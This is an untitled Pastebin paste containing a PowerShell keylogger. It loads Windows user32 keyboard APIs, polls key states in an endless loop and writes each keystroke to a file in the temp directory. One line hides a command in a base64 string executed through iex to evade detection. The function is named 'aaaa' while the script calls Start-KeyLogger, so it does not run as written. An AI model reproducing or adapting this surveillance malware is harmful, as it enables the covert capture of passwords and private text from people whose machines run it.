SHARE
TWEET

Untitled

a guest Nov 22nd, 2019 86 Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1.  
  2. function aaaa($Path="$env:temp\keys")
  3. {
  4.   # Signatures for API Calls
  5.   $signatures = @'
  6. [DllImport("user32.dll", CharSet=CharSet.Auto, ExactSpelling=true)]
  7. public static extern short GetAsyncKeyState(int virtualKeyCode);
  8. [DllImport("user32.dll", CharSet=CharSet.Auto)]
  9. public static extern int GetKeyboardState(byte[] keystate);
  10. [DllImport("user32.dll", CharSet=CharSet.Auto)]
  11. public static extern int MapVirtualKey(uint uCode, int uMapType);
  12. [DllImport("user32.dll", CharSet=CharSet.Auto)]
  13. public static extern int ToUnicode(uint wVirtKey, uint wScanCode, byte[] lpkeystate, System.Text.StringBuilder pwszBuff, int cchBuff, uint wFlags);
  14. '@
  15.  
  16.   # load signatures and make members available
  17.   $API = Add-Type -MemberDefinition $signatures -Name 'Win32' -Namespace API -PassThru
  18.    
  19.   # create output file
  20.   $null = New-Item -Path $Path -ItemType File -Force
  21.  
  22.     # create endless loop. When user presses CTRL+C, finally-block
  23.     # executes and shows the collected key presses
  24.     while ($true) {
  25.       Start-Sleep -Milliseconds 40
  26.      
  27.       # scan all ASCII codes above 8
  28.       for ($ascii = 9; $ascii -le 254; $ascii++) {
  29.         # get current key state
  30.        
  31. [System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String("IAAkAHMAdABhAHQAZQAgAD0AIAAkAEEAUABJADoAOgBHAGUAdABBAHMAeQBuAGMASwBlAHkAUwB0AGEAdABlACgAJABhAHMAYwBpAGkAKQA="))|iex
  32.  
  33.  
  34.         # is key pressed?
  35.         if ($state -eq -32767) {
  36.           $null = [console]::CapsLock
  37.  
  38.           # translate scan code to real code
  39.           $virtualKey = $API::MapVirtualKey($ascii, 3)
  40.  
  41.           # get keyboard state for virtual keys
  42.           $kbstate = New-Object Byte[] 256
  43.           $checkkbstate = $API::GetKeyboardState($kbstate)
  44.  
  45.           # prepare a StringBuilder to receive input key
  46.           $mychar = New-Object -TypeName System.Text.StringBuilder
  47.  
  48.           # translate virtual key
  49.           $success = $API::ToUnicode($ascii, $virtualKey, $kbstate, $mychar, $mychar.Capacity, 0)
  50.  
  51.           if ($success)
  52.           {
  53.             # add key to logger file
  54.             [System.IO.File]::AppendAllText($Path, $mychar, [System.Text.Encoding]::Unicode)
  55.           }
  56.         }
  57.       }
  58.     }
  59.   }
  60.  
  61. Start-KeyLogger
RAW Paste Data
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy. OK, I Understand
 
Top